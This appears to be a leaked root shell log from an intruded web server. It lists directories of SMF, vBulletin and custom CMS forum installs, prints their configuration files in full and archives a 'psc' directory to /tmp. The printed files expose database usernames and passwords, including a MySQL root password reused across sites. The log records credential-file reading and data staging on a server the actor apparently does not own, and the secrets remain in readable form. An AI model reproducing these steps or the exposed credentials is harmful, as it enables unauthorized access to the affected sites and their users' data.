+drwxrwxrwx 3 root root 4096 Apr 22 2010 Packages +-rw-r--r-- 1 root root 74243 Feb 14 2010 SSI.php +-rwxrwxrwx 1 root root 3998 Apr 22 2010 Settings.php +-rwxrwxrwx 1 root root 3998 Apr 22 2010 Settings_bak.php +drwxrwxrwx 5 root root 4096 Apr 22 2010 Smileys +drwxr-sr-x 2 root root 4096 Apr 22 2010 Sources +drwxrwxrwx 8 root root 4096 Apr 22 2010 Themes +-rwxrwxrwx 1 root root 3343 Jun 5 2005 agreement.txt +drwxrwxrwx 2 root root 4096 Apr 24 2010 attachments +drwxrwxrwx 4 root root 4096 Apr 22 2010 avatars +drwxrwxrwx 2 root root 12288 Dec 28 02:20 cache +-rw-r--r-- 1 root root 15347 Feb 14 2010 index.php +-rw-r--r-- 1 root root 3975 Jan 6 2009 license.txt +-rw-r--r-- 1 root root 2650 Feb 23 2010 news_readme.html +-rw-r--r-- 1 root root 12350 Feb 23 2010 readme.html +-rw-r--r-- 1 root root 30030 Feb 14 2010 ssi_examples.php +-rw-r--r-- 1 root root 5909 Jan 1 2010 ssi_examples.shtml +-rw-r--r-- 1 root root 10147 Feb 14 2010 subscriptions.php + +# cat Settings.php +<?php +/********************************************************************************** +* Settings.php * +*********************************************************************************** +* SMF: Simple Machines Forum * +* Open-Source Project Inspired by Zef Hemel (zef@zefhemel.com) * +* =============================================================================== * +* Software Version: SMF 2.0 RC3 * +* Software by: Simple Machines (http://www.simplemachines.org) * +* Copyright 2006-2010 by: Simple Machines LLC (http://www.simplemachines.org) * +* 2001-2006 by: Lewis Media (http://www.lewismedia.com) * +* Support, News, Updates at: http://www.simplemachines.org * +*********************************************************************************** +* This program is free software; you may redistribute it and/or modify it under * +* the terms of the provided license as published by Simple Machines LLC. * +* * +* This program is distributed in the hope that it is and will be useful, but * +* WITHOUT ANY WARRANTIES; without even any implied warranty of MERCHANTABILITY * +* or FITNESS FOR A PARTICULAR PURPOSE. * +* * +* See the "license.txt" file for details of the Simple Machines license. * +* The latest version can always be found at http://www.simplemachines.org. * +**********************************************************************************/ + +########## Maintenance ########## +# Note: If $maintenance is set to 2, the forum will be unusable! Change it to 0 to fix it. +$maintenance = 0; # Set to 1 to enable Maintenance Mode, 2 to make the forum untouchable. (you'll have to make it 0 again manually!) +$mtitle = 'Maintenance Mode'; # Title for the Maintenance Mode message. +$mmessage = 'Okay faithful users...we\'re attempting to restore an older backup of the database...news will be posted once we\'re back!'; # Description of why the forum is in maintenance mode. + +########## Forum Info ########## +$mbname = 'SceneCrypt'; # The name of your forum. +$language = 'english'; # The default language file set for the forum. +$boardurl = 'http://scenecrypt.org/board'; # URL to your forum's folder. (without the trailing /!) +$webmaster_email = 'admin@admin.de'; # Email address to send emails from. (like noreply@yourdomain.com.) +$cookiename = 'SMFCookie410'; # Name of the cookie to set for authentication. + +########## Database Info ########## +$db_type = 'mysql'; +$db_server = 'localhost'; +$db_name = 'smf13'; +$db_user = 'root'; +$db_passwd = 'QkZorIZZC5e'; +$ssi_db_user = ''; +$ssi_db_passwd = ''; +$db_prefix = 'smf13_'; +$db_persist = 0; +$db_error_send = 1; + +########## Directories/Files ########## +# Note: These directories do not have to be changed unless you move things. +$boarddir = '/var/www/scenecrypt.org/web/board'; # The absolute path to the forum's folder. (not just '.'!) +$sourcedir = '/var/www/scenecrypt.org/web/board/Sources'; # Path to the Sources directory. +$cachedir = '/var/www/scenecrypt.org/web/board/cache'; # Path to the cache directory. + +########## Error-Catching ########## +# Note: You shouldn't touch these settings. +$db_last_error = 0; + + +# Make sure the paths are correct... at least try to fix them. +if (!file_exists($boarddir) && file_exists(dirname(__FILE__) . '/agreement.txt')) + $boarddir = dirname(__FILE__); +if (!file_exists($sourcedir) && file_exists($boarddir . '/Sources')) + $sourcedir = $boarddir . '/Sources'; +if (!file_exists($cachedir) && file_exists($boarddir . '/cache')) + $cachedir = $boarddir . '/cache'; + +$db_character_set = 'utf8'; + +# cd /var/www/dreckrebea12313123123131313131312313123/ && ls -la +total 16 +drwxrwxrwx 3 root root 4096 Apr 15 2010 . +drwxr-xr-x 9 root root 4096 Dec 28 02:33 .. +-rw-r--r-- 1 root root 35 Mar 15 2010 index.php +drwxrwxrwx 4 root root 4096 Apr 15 2010 web + +# cd web && ls -la +total 68 +drwxrwxrwx 4 root root 4096 Apr 15 2010 . +drwxrwxrwx 3 root root 4096 Apr 15 2010 .. +-rwxrwxrwx 1 root root 983 Mar 15 2010 conf.php +drwxrwxrwx 3 root root 4096 May 11 2010 images +-rw-r--r-- 1 root root 42787 Apr 15 2010 index.php +-rw-r--r-- 1 root root 1 Apr 15 2010 index__.php +drwxrwxrwx 3 root root 4096 Mar 15 2010 psc + +# cat conf.php +<?php +define(_SceneCMS_footer, "SceneCMS v1.0"); +define(_SceneCMS_admin, "mimimi"); +define(_SceneCMS_Host, "localhost"); +define(_SceneCMS_Username, "qstore"); +define(_SceneCMS_Password, "4cFRwaLnt2qS2QSp"); +define(_SceneCMS_Database, "qstore"); + +mysql_connect(_SceneCMS_Host,_SceneCMS_Username,_SceneCMS_Password); +mysql_select_db(_SceneCMS_Database); + + + function strFilter($text) { + return (string)htmlentities($text); + } + +function sql_str_escape($str) { + if(get_magic_quotes_gpc()) + stripslashes($str); + return mysql_real_escape_string($str); +} + + function Logout() { + $_SESSION['cms_name'] = ""; + $_SESSION['cms_validate'] = ""; + session_destroy(); + + } + + function CheckLogin($killtrue) { + + if ($_SESSION['cms_name'] == "" or $_SESSION['cms_validate'] == "") { + if($killtrue == 1 or $killtrue == "1") { + echo ' + <script> + window.location.href = "?"; + </script> + '; + die("No Access"); + exit(); + } + return "0"; + } else { + return "1"; + } + } +?> + +# tar cvjf /tmp/psc.tar.bz2 psc/ +psc/ +psc/data/ +psc/data/money-coin.png +psc/data/Webbrowser.class.php +psc/data/bg_code.jpg +psc/data/bg.jpg +psc/data/bg_lock.jpg +psc/data/bg_captcha.jpg +psc/index.html +psc/api.php +psc/cookie.txt + +# cd /var/www/sadas.org/ && ls -la +total 5632 +drwxr-xr-x 16 root root 4096 Oct 17 22:20 . +drwxr-xr-x 9 root root 4096 Dec 28 02:33 .. +-rw-r--r-- 1 root root 19565 Apr 5 2010 LICENSE +drwxr-xr-x 3 root root 4096 Apr 5 2010 admincp +-rw-r--r-- 1 root root 23760 Apr 5 2010 ajax.php +-rw-r--r-- 1 root root 75427 Apr 5 2010 album.php +-rw-r--r-- 1 root root 17051 Apr 5 2010 announcement.php +drwxr-xr-x 2 root root 4096 Apr 5 2010 archive +-rw-r--r-- 1 root root 18225 Apr 5 2010 attachment.php +-rw-r--r-- 1 root root 75242 Apr 5 2010 calendar.php +-rw-r--r-- 1 root root 58135 Apr 5 2010 checksums.md5 +-rw-r--r-- 1 root root 43 Apr 5 2010 clear.gif +drwxr-xr-x 4 root root 4096 Apr 5 2010 clientscript +-rw-r--r-- 1 root root 15277 Apr 5 2010 converse.php +drwxr-xr-x 7 root root 4096 Apr 5 2010 cpstyles +-rw-r--r-- 1 root root 3233 Apr 5 2010 cron.php +drwxr-xr-x 3 root root 4096 Apr 5 2010 customavatars +drwxr-xr-x 3 root root 4096 Apr 5 2010 customgroupicons +drwxr-xr-x 2 root root 4096 Apr 5 2010 customprofilepics +-rw-r--r-- 1 root root 3485 Apr 5 2010 dgt_released.nfo +-rw-r--r-- 1 root root 47671 Apr 5 2010 editpost.php +-rw-r--r-- 1 root root 29410 Apr 5 2010 external.php +-rw-r--r-- 1 root root 9702 Apr 5 2010 faq.php +-rw-r--r-- 1 root root 10134 Apr 5 2010 favicon.ico +-rw-r--r-- 1 root root 521 Apr 5 2010 file_id.diz +-rw-r--r-- 1 root root 35900 Apr 5 2010 forumdisplay.php +-rw-r--r-- 1 root root 39747 Apr 5 2010 global.php +-rw-r--r-- 1 root root 138104 Apr 5 2010 group.php +-rw-r--r-- 1 root root 24835 Apr 5 2010 group_inlinemod.php +-rw-r--r-- 1 root root 10747 Apr 5 2010 groupsubscription.php +-rw-r--r-- 1 root root 8963 Apr 5 2010 image.php +drwxr-xr-x 16 root root 4096 Apr 5 2010 images +drwxr-xr-x 6 root root 12288 May 22 2010 includes +-rw-r--r-- 1 root root 19508 Apr 5 2010 index.php +-rw-r--r-- 1 root root 43844 Apr 5 2010 infraction.php +-rw-r--r-- 1 root root 182837 Apr 5 2010 inlinemod.php +drwxr-xr-x 2 root root 4096 May 22 2010 install +-rw-r--r-- 1 root root 10258 Apr 5 2010 joinrequests.php +-rw-r--r-- 1 root root 10138 Apr 5 2010 login.php +-rw-r--r-- 1 root root 16980 Apr 5 2010 member.php +-rw-r--r-- 1 root root 15847 Apr 5 2010 member_inlinemod.php +-rw-r--r-- 1 root root 35817 Apr 5 2010 memberlist.php +-rw-r--r-- 1 root root 23782 Apr 5 2010 misc.php +drwxr-xr-x 2 root root 4096 Apr 5 2010 modcp +-rw-r--r-- 1 root root 63240 Apr 5 2010 moderation.php +-rw-r--r-- 1 root root 6672 Apr 5 2010 moderator.php +-rw-r--r-- 1 root root 18392 Apr 5 2010 newattachment.php +-rw-r--r-- 1 root root 37017 Apr 5 2010 newreply.php +-rw-r--r-- 1 root root 18827 Apr 5 2010 newthread.php +-rw-r--r-- 1 root root 19520 Apr 5 2010 online.php +-rw-r--r-- 1 root root 7612 Apr 5 2010 payment_gateway.php +-rw-r--r-- 1 root root 11826 Apr 5 2010 payments.php +-rw-r--r-- 1 root root 7805 Apr 5 2010 picture.php +-rw-r--r-- 1 root root 21956 Apr 5 2010 picture_inlinemod.php +-rw-r--r-- 1 root root 25223 Apr 5 2010 picturecomment.php +-rw-r--r-- 1 root root 27328 Apr 5 2010 poll.php +-rw-r--r-- 1 root root 9428 Apr 5 2010 posthistory.php +-rw-r--r-- 1 root root 74284 Apr 5 2010 postings.php +-rw-r--r-- 1 root root 6509 Apr 5 2010 printthread.php +-rw-r--r-- 1 root root 70656 Apr 5 2010 private.php +-rw-r--r-- 1 root root 152244 Apr 5 2010 profile.php +-rw-r--r-- 1 root root 39667 Apr 5 2010 register.php +-rw-r--r-- 1 root root 5603 Apr 5 2010 report.php +-rw-r--r-- 1 root root 13635 Apr 5 2010 reputation.php +-rw-r--r-- 1 root root 124633 Apr 5 2010 search.php +-rw-r--r-- 1 root root 20862 Apr 5 2010 sendmessage.php +-rw-r--r-- 1 root root 9925 Apr 5 2010 showgroups.php +-rw-r--r-- 1 root root 12304 Apr 5 2010 showpost.php +-rw-r--r-- 1 root root 75611 Apr 5 2010 showthread.php +drwxr-xr-x 2 root root 4096 Apr 5 2010 signaturepics +-rw-r--r-- 1 root root 32792 Apr 5 2010 subscription.php +-rw-r--r-- 1 root root 13281 Apr 5 2010 tags.php +-rw-r--r-- 1 root root 8608 Apr 5 2010 threadrate.php +-rw-r--r-- 1 root root 12331 Apr 5 2010 threadtag.php +drwxr-xr-x 2 root root 4096 May 22 2010 upload +-rw-r--r-- 1 root root 34424 Apr 5 2010 usercp.php +-rw-r--r-- 1 root root 19011 Apr 5 2010 usernote.php +-rw-r--r-- 1 root root 29490 Apr 5 2010 validator.php +-rw-r--r-- 1 root root 3417514 May 22 2010 vb38.rar +-rw-r--r-- 1 root root 27293 Apr 5 2010 visitormessage.php +drwxr-xr-x 2 root root 4096 May 22 2010 web + +# cat includes/config.php +<?php +/*======================================================================*\ +|| #################################################################### || +|| # vBulletin 3.8.5 +|| # ---------------------------------------------------------------- # || +|| # All PHP code in this file is ?2000-2010 Jelsoft Enterprises Ltd. # || +|| # This file may not be redistributed in whole or significant part. # || +|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # || +|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # || +|| #################################################################### || +\*======================================================================*/ + +/*-------------------------------------------------------*\ +| ****** HINWEIS ZU DEN VARIABLEN IN DIESER DATEI ******* | ++---------------------------------------------------------+ +| Falls bei dem Verbindungsaufbau zu Ihrer MySQL-Daten- | +| bank Fehler auftreten, muessen Sie Ihren Provider um | +| Hilfe bitten, da wir Ihnen die richtigen Daten fuer die | +| Variablen in dieser Datei nicht nennen koennen. | +\*-------------------------------------------------------*/ + + // ****** DATENBANK: TYP ****** + // Tragen Sie hier den Typ Ihres Datenbankservers ein, auf dem sich die vBulletin-Datenbank + // befinden wird bzw. befindet. Gueltige Optionen sind mysql und mysqli. + // Versuchen Sie es mit mysqli, wenn Sie PHP 5 und MySQL 4.1+ verwenden. + // Wenn Sie eine Master-Slave Datenbankkonfiguration betreiben moechten, tragen Sie 'mysql_slave' bzw. 'mysqli_slave' ein. +$config['Database']['dbtype'] = 'mysql'; + + // ****** DATENBANK: NAME DER DATENBANK ****** + // Tragen Sie hier den Namen der Datenbank ein, mit der vBulletin arbeiten soll. + // Diesen Datenbanknamen erhalten Sie normalerweise von Ihrem Provider. +$config['Database']['dbname'] = 'cccteam'; + + // ****** TABELLEN-PRAEFIX ****** + // Praefix, das den Tabellennamen in der Datenbank vorangestellt wird. + // Zum Beispiel: $config['Database']['tableprefix'] = 'vb3_'; + // Hinweis: Praefixe fuer die Tabellennamen koennen Sie mit der Datei + // install/tableprefix.php hinzufuegen, aendern oder entfernen. +$config['Database']['tableprefix'] = ''; + + // ****** TECHNISCHE E-MAIL-ADRESSE ****** + // Treten Fehler bei der Datenbank auf, wird eine E-Mail mit einer Fehlerbeschreibung + // an diese Adresse geschickt. + // Falls Sie hier keine E-Mail-Adresse eintragen, werden bei Datenbankfehlern keine + // E-Mails verschickt. +$config['Database']['technicalemail'] = 'dbmeister@beispiel.xy'; + + // ****** LEEREN SQL-MODUS ERZWINGEN ****** + // In neueren Versionen von MySQL (4.1+) gibt es einige Neuerungen, die nicht mit vBulletin + // kompatibel sind. Wenn Sie diese Einstellung auf "true" setzen, werden diese Neuerungen + // deaktiviert. Sie muessen diese Einstellung nur aendern, wenn vBulletin Sie dazu auffordert. +$config['Database']['force_sql_mode'] = false; + + + + // ****** MASTER-DATENBANK: SERVERNAME UND PORT ****** + // Tragen Sie hier den Hostnamen oder die IP-Adresse und den Port Ihres Datenbankservers ein. + // Wenn Sie sich nicht sicher sind, was Sie hier eintragen muessen, versuchen Sie es zunaechst + // mit dem Standardwerten. +$config['MasterServer']['servername'] = 'localhost'; +$config['MasterServer']['port'] = 3306; + + // ****** MASTER-DATENBANK: BENUTZERNAME & KENNWORT ****** + // Tragen Sie hier den Benutzernamen und das Kennwort ein, die Sie fuer den Zugriff + // auf den MySQL-Server benoetigen. + // Den Benutzernamen und das Kennwort erhalten Sie von Ihrem Provider. +$config['MasterServer']['username'] = 'root'; +$config['MasterServer']['password'] = 'QkZorIZZC5e'; + + // ****** MASTER-DATENBANK: PERSISTENTE VERBINDUNGEN ****** + // Hier koennen Sie festlegen, ob persistente Verbindungen zu MySQL genutzt werden sollen. + // Der Performance-Unterschied ist im Normalfall vernachlaessigbar, ausser vielleicht + // bei extrem grossen Foren. + // Wenn Sie nicht sicher sind, was Sie hier angeben sollen, lassen Sie die Einstellung + // auf aus. + // 0 = aus; 1 = an +$config['MasterServer']['usepconnect'] = 0; + + + + // ****** SLAVE-DATENBANK: KONFIGURATION ****** + // Wenn Sie zwei Datenbankserver verwenden, koennen Sie hier die Daten fuer den Slave-Server + // festlegen. + // Wenn Sie sich nicht 100% sicher sind, ob Sie hier etwas eintragen muessen, veraendern Sie die + // Standardeinstellungen nicht. +$config['SlaveServer']['servername'] = ''; +$config['SlaveServer']['port'] = 3306; +$config['SlaveServer']['username'] = ''; +$config['SlaveServer']['password'] = ''; +$config['SlaveServer']['usepconnect'] = 0; + + + + // ****** PFADE ZUM ADMINISTRATOR- UND MODERATOR-KONTROLLZENTRUM ****** + // Hier koennen Sie fuer die Verzeichnisse, in denen sich die Dateien fuer das + // Administrator- und Moderator-Kontrollzentrum befinden, alternative Namen an- + // geben. Vielleicht moechten Sie dies aus Sicherheitsgruenden tun. + // Bitte beachten Sie, dass, wenn Sie die Namen hier aendern, Sie auch noch die + // Namen der Verzeichnisse auf dem Server aendern muessen. +$config['Misc']['admincpdir'] = 'admincp'; +$config['Misc']['modcpdir'] = 'modcp'; + + // ****** COOKIE-PRAEFIX ****** + // Praefix, das in allen vBulletin-Cookies enthalten ist. + // Halten Sie es kurz und verwenden Sie nur Zahlen und Buchstaben, d.h. 1-9 und a-Z +$config['Misc']['cookieprefix'] = 'bb'; + + // ****** VOLLSTAENDIGER PFAD ZUM VERZEICHNIS DES FORUMS ****** + // Bei einigen Servern kann es noetig sein, den vollstaendigen Pfad zum Verzeichnis des Forums + // anzugeben, damit vBulletin ohne Probleme funktioniert. Sie muessen diese Einstellung nur + // aendern, wenn vBulletin Sie dazu auffordert. + // Hinweis: Verwenden Sie keinen abschliessenden Schraegstrich ('/') nach dem Verzeichnisnamen. + // Beispiel fuer Unix: + // $config['Misc']['forumpath'] = '/home/users/public_html/forums'; + // Beispiel fuer Win32: + // $config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3'; +$config['Misc']['forumpath'] = ''; + + // ****** COOKIE SICHERHEITS HASH ****** + // Diese Option erlaubt die Cookies zu verschluesseln. + // Benutzbar sind dabei jegliche Zahlen und Buchstaben, d.h. 1-9 und a-Z. + // Diese Angabe kann leer gelassen werden um den Standard zu benutzen. + // Hinweis: Bei Aenderung werden alle Benutzer ausgeloggt. +$config['Misc']['cookie_security_hash'] = ''; + + + // ****** BENUTZER, DIE DAS KONTROLLZENTRUM-LOG SEHEN DUERFEN ****** + // Alle hier angegebenen Benutzer koennen im Administrator-Kontrollzentrum das + // Kontrollzentrum-Log ansehen. + // Die Benutzer werden hier durch ihre User-ID angegeben. Um die User-ID heraus- + // zufinden, sehen Sie sich den Benutzer im Administrator-Kontrollzentrum an. + // Falls Sie diese Datei fuer eine Neuinstallation aendern, lassen Sie den Standard- + // wert stehen, da der erste Benutzer (Administrator) die User-ID 1 erhaelt. + // Trennen Sie mehrere User-IDs mit einem Komma voneinander. + // Beispiel 1: $config['SpecialUsers']['canviewadminlog'] = '1'; + // Beispiel 2: $config['SpecialUsers']['canviewadminlog'] = '1,5,9'; +$config['SpecialUsers']['canviewadminlog'] = '1'; + + // ****** BENUTZER, DIE DAS KONTROLLZENTRUM-LOG LOESCHEN DUERFEN ****** + // Alle hier angegebenen Benutzer koennen im Administrator-Kontrollzentrum + // Eintraege aus dem Kontrollzentrum-Log loeschen. + // Trennen Sie mehrere User-IDs mit einem Komma voneinander (s.o.). +$config['SpecialUsers']['canpruneadminlog'] = '1'; + + // ****** BENUTZER, DIE QUERYS AUSFUEHREN DUERFEN ****** + // Alle hier angegebenen Benutzer koennen im Administrator-Kontrollzentrum + // Querys (Datenbankabfragen) ausfuehren. + // Trennen Sie mehrere User-IDs mit einem Komma voneinander (s.o.). + // Hinweis: Querys ausfuehren zu koennen, kann eine kritische Angelegenheit sein. + // Aus Sicherheitsgruenden sollten Sie in diese Liste keine User-IDs eintragen. +$config['SpecialUsers']['canrunqueries'] = ''; + + // ****** UNLOESCHBARE / UNVERAENDERBARE BENUTZER ****** + // Alle hier angegebenen Benutzer koennen im Administrator-Kontrollzentrum + // von anderen Benutzern nicht geloescht oder bearbeitet werden. + // Trennen Sie mehrere User-IDs mit einem Komma voneinander (s.o.). +$config['SpecialUsers']['undeletableusers'] = ''; + + // ****** SUPER-ADMINISTRATOREN ****** + // Alle hier angegebenen Benutzer koennen im Administrator-Kontrollzentrum die + // Seite fuer die Administrator-Berechtigungen aufrufen und damit die Rechte + // anderer Administratoren bearbeiten. + // Trennen Sie mehrere User-IDs mit einem Komma voneinander (s.o.). +$config['SpecialUsers']['superadministrators'] = '1'; + + // ****** DATASTORE-CACHE KONFIGURATION ****** + // Hier koennen Sie die verschiedenen Methoden konfigurieren, die fuer den Cache + // der Datastore-Elemente verwendet werden. + // vB_Datastore_Filecache - um die Cache-Datei /includes/datastore/datastore_cache.php zu verwenden (CHMOD 777 benoetigt) + // vB_Datastore_APC - um APC zu verwenden + // vB_Datastore_XCache - um XCache zu verwenden + // vB_Datastore_eAccelerator - um eAccelerator zu verwenden + // vB_Datastore_Memcached - um einen Memcache-Server zu verwenden (Konfiguration weiter unten) +// $config['Datastore']['class'] = 'vB_Datastore_Filecache'; + + // ****** DATASTORE-PRAEFIX ****** + // Wenn Sie einen PHP-Cache (APC, XCache, eAccelerator) verwenden und auf Ihrem + // Server mehr als ein Forum installiert ist, *kann* es sein, dass Sie hier + // ein Datastore-Praefix angeben muessen, damit die Foren nicht dieselbe + // Variable im Cache verwenden. + // Dies funktioniert aehnlich wie das Tabellen-Praefix fuer die Datenbank. +// $config['Datastore']['prefix'] = ''; + + // Bei einem Memcache-Server ist es auch notwendig, dass Sie den Hostnamen bzw. + // die IP-Adresse und den Port angeben, unter denen der Server erreichbar ist: +/* +$config['Datastore']['class'] = 'vB_Datastore_Memcached'; +$i = 0; +// Erster Server +$i++; +$config['Misc']['memcacheserver'][$i] = '127.0.0.1'; +$config['Misc']['memcacheport'][$i] = 11211; +$config['Misc']['memcachepersistent'][$i] = true; +$config['Misc']['memcacheweight'][$i] = 1; +$config['Misc']['memcachetimeout'][$i] = 1; +$config['Misc']['memcacheretry_interval'][$i] = 15; +*/ + +// ******************************************************************************** +// ****** Die folgenden Einstellungen werden nur in Spezialfaellen benoetigt ****** +// ******************************************************************************** + + // ****** MySQLI-EINSTELLUNGEN ****** + // Wenn Sie MySQL 4.1+ verwenden, sollte MySQLi fuer die Verbindung zur Datenbank + // verwendet werden. + // Wenn Ihre Datenbank einen anderen Zeichensatz als 'latin1' verwendet, koennen Sie + // hier den Standard-Zeichensatz fuer die Verbindung angeben. + // Wenn Sie nicht denselben Zeichensatz angeben, den Ihre Datenbank verwendet, kann + // es zu Fehlermeldungen dieser Art kommen: + // 'mysql error: Illegal mix of collations' + // Sie muessen diese Einstellung nur aendern, wenn Sie sicher wissen, dass dies noetig ist. +// $config['Mysqli']['charset'] = 'utf8'; + + // Zusaetzlich kann PHP angewiesen werden, die Verbindungs-Parameter aus der Datei + // auszulesen, die in 'ini_file' angegeben wurde. Bitte geben Sie den vollstaendigen + // Pfad zu dieser Datei an. + // Beispiel: + // $config['Mysqli']['ini_file'] = 'C:\Programme\MySQL\MySQL Server 4.1\my.ini'; +$config['Mysqli']['ini_file'] = ''; + + // Einstellungen fuer die Grafikverarbeitung + // Alle Grafiken, die groesser als die unten angegebenen Dimensionen sind, werden von + // vBulletin nicht verkleinert. Wenn auch groessere Grafiken verkleinert werden sollen, + // passen Sie diese Einstellungen an. +$config['Misc']['maxwidth'] = 2592; +$config['Misc']['maxheight'] = 1944; + + // GZIP komplett deaktivieren: Dies ist noetig, wenn auf dem Server standardmaessig + // GZIP aktiv ist und diese Option auch im Administrator-Kontrollzentrum aktiviert wurde. + // Dadurch ist oft in vBulletin keine Anmeldung mehr moeglich. + // Moeglicherweise ist es noetig, die folgende Zeile in der Datei /includes/init.php oder + // /includes/class_core.php aufzunehmen, damit dieser Eintrag wirksam wird. +//define('NOZIP', 1); + + // Plug-in-System komplett deaktivieren: Dies ist noetig, wenn durch + // fehlerhafte Plug-ins in vBulletin keine Anmeldung mehr moeglich ist. +//define('DISABLE_HOOKS', 1); + + // Keine E-Mails verschicken. Diese Einstellung sollte fuer ein Test-Forum aktiviert werden. +//define('DISABLE_MAIL', true); + + // Debug-Modus aktivieren: Nur fuer Entwickler gedacht. +//if (VB_AREA == 'AdminCP') +//{ +// $config['Misc']['debug'] = 1; +//} + +/*======================================================================*\ +|| #################################################################### +|| # CVS: $RCSfile$ - $Revision: 1035 $ 28757 +|| #################################################################### +\*======================================================================*/ + +// Ja, es ist richtig, dass am Ende dieser Datei kein schliessendes PHP-Tag steht! +// Dadurch wird ein haeufig auftretender Fehler vermieden. + +# cd /var/www/scenecms.org/ && ls -la +total 32 +drwxrwxrwx 4 root root 4096 Oct 1 09:18 . +drwxr-xr-x 9 root root 4096 Dec 28 02:33 .. +drwxr-xr-x 3 root root 4096 Oct 1 09:18 ba +-rw-r--r-- 1 root root 35 Mar 15 2010 index.php +-rw-r--r-- 1 root root 9962 May 10 2010 oldDATA.tgz +drwxrwxrwx 3 root root 4096 Jul 8 2010 web + +# cd web && ls -la +total 12 +drwxrwxrwx 3 root root 4096 Jul 8 2010 . +drwxrwxrwx 4 root root 4096 Oct 1 09:18 .. +drwxr-xr-x 16 root root 4096 Oct 2 15:14 board + +# cd board/ && ls -la +total 2272 +drwxr-xr-x 16 root root 4096 Oct 2 15:14 . +drwxrwxrwx 3 root root 4096 Jul 8 2010 .. +-rw-r--r-- 1 root root 17097 Apr 23 2010 LICENSE +drwxr-xr-x 3 root root 4096 Oct 2 15:31 admincp +-rw-r--r-- 1 root root 38048 Apr 23 2010 ajax.php +-rw-r--r-- 1 root root 75538 Apr 23 2010 album.php +-rw-r--r-- 1 root root 19054 Apr 23 2010 announcement.php +drwxr-xr-x 2 root root 4096 Jul 8 2010 archive +-rw-r--r-- 1 root root 8945 Apr 23 2010 asset.php +-rw-r--r-- 1 root root 20246 Apr 23 2010 assetmanage.php +-rw-r--r-- 1 root root 15723 Apr 23 2010 attachment.php +-rw-r--r-- 1 root root 6119 Apr 23 2010 attachment_inlinemod.php +-rw-r--r-- 1 root root 3462 Apr 23 2010 blog_attachment.php +-rw-r--r-- 1 root root 96014 Apr 23 2010 calendar.php +-rw-r--r-- 1 root root 43 Apr 23 2010 clear.gif +drwxr-xr-x 7 root root 4096 Jul 8 2010 clientscript +-rw-r--r-- 1 root root 15283 Apr 23 2010 converse.php +drwxr-xr-x 7 root root 4096 Jul 8 2010 cpstyles +-rw-r--r-- 1 root root 3244 Apr 23 2010 cron.php +-rw-r--r-- 1 root root 4051 Apr 23 2010 css.php +drwxr-xr-x 3 root root 4096 Jul 8 2010 customavatars +drwxr-xr-x 3 root root 4096 Jul 8 2010 customgroupicons +drwxr-xr-x 2 root root 4096 Jul 8 2010 customprofilepics +-rw-r--r-- 1 root root 1660 Apr 23 2010 editor.php +-rw-r--r-- 1 root root 46327 Apr 23 2010 editpost.php +-rw-r--r-- 1 root root 1336 Apr 23 2010 entry.php +-rw-r--r-- 1 root root 29278 Apr 23 2010 external.php +-rw-r--r-- 1 root root 9901 Apr 23 2010 faq.php +-rw-r--r-- 1 root root 10134 Apr 23 2010 favicon.ico +-rw-r--r-- 1 root root 22502 Apr 23 2010 forum.php +-rw-r--r-- 1 root root 42428 Apr 23 2010 forumdisplay.php +-rw-r--r-- 1 root root 2001 Apr 23 2010 global.php +-rw-r--r-- 1 root root 155709 Apr 23 2010 group.php +-rw-r--r-- 1 root root 26085 Apr 23 2010 group_inlinemod.php +-rw-r--r-- 1 root root 11483 Apr 23 2010 groupsubscription.php +-rw-r--r-- 1 root root 8974 Apr 23 2010 image.php +drwxr-xr-x 24 root root 4096 Oct 2 16:42 images +drwxr-xr-x 8 root root 12288 Oct 2 15:27 includes +-rw-r--r-- 1 root root 2335 Apr 23 2010 index.php +-rw-r--r-- 1 root root 46944 Apr 23 2010 infraction.php +-rw-r--r-- 1 root root 186868 Apr 23 2010 inlinemod.php +drwxr-xr-x 3 root root 4096 Oct 2 15:09 install +-rw-r--r-- 1 root root 11280 Apr 23 2010 joinrequests.php +-rw-r--r-- 1 root root 1656 Apr 23 2010 list.php +-rw-r--r-- 1 root root 10749 Apr 23 2010 login.php +-rw-r--r-- 1 root root 18893 Apr 23 2010 member.php +-rw-r--r-- 1 root root 16327 Apr 23 2010 member_inlinemod.php +-rw-r--r-- 1 root root 40280 Apr 23 2010 memberlist.php +-rw-r--r-- 1 root root 22247 Apr 23 2010 misc.php +drwxr-xr-x 2 root root 4096 Jul 8 2010 modcp +-rw-r--r-- 1 root root 75687 Apr 23 2010 moderation.php +-rw-r--r-- 1 root root 6714 Apr 23 2010 moderator.php +-rw-r--r-- 1 root root 17286 Apr 23 2010 newattachment.php +-rw-r--r-- 1 root root 38921 Apr 23 2010 newreply.php +-rw-r--r-- 1 root root 19610 Apr 23 2010 newthread.php +-rw-r--r-- 1 root root 21719 Apr 23 2010 online.php +drwxr-xr-x 5 root root 4096 Jul 8 2010 packages +-rw-r--r-- 1 root root 8031 Apr 23 2010 payment_gateway.php +-rw-r--r-- 1 root root 13196 Apr 23 2010 payments.php +-rw-r--r-- 1 root root 3997 Apr 23 2010 picture.php +-rw-r--r-- 1 root root 16600 Apr 23 2010 picture_inlinemod.php +-rw-r--r-- 1 root root 26104 Apr 23 2010 picturecomment.php +-rw-r--r-- 1 root root 29273 Apr 23 2010 poll.php +-rw-r--r-- 1 root root 10349 Apr 23 2010 posthistory.php +-rw-r--r-- 1 root root 76416 Apr 23 2010 postings.php +-rw-r--r-- 1 root root 7022 Apr 23 2010 printthread.php +-rw-r--r-- 1 root root 78993 Apr 23 2010 private.php +-rw-r--r-- 1 root root 160820 Apr 23 2010 profile.php +-rw-r--r-- 1 root root 296 Apr 23 2010 receiver.php +-rw-r--r-- 1 root root 54170 Apr 23 2010 register.php +-rw-r--r-- 1 root root 5742 Apr 23 2010 report.php +-rw-r--r-- 1 root root 14700 Apr 23 2010 reputation.php +-rw-r--r-- 1 root root 34065 Apr 23 2010 search.php +-rw-r--r-- 1 root root 22645 Apr 23 2010 sendmessage.php +-rw-r--r-- 1 root root 12420 Apr 23 2010 showgroups.php +-rw-r--r-- 1 root root 12673 Apr 23 2010 showpost.php +-rw-r--r-- 1 root root 79415 Apr 23 2010 showthread.php +drwxr-xr-x 2 root root 4096 Jul 8 2010 signaturepics +-rw-r--r-- 1 root root 37650 Apr 23 2010 subscription.php +-rw-r--r-- 1 root root 5334 Apr 23 2010 tags.php +-rw-r--r-- 1 root root 8735 Apr 23 2010 threadrate.php +-rw-r--r-- 1 root root 11081 Apr 23 2010 threadtag.php 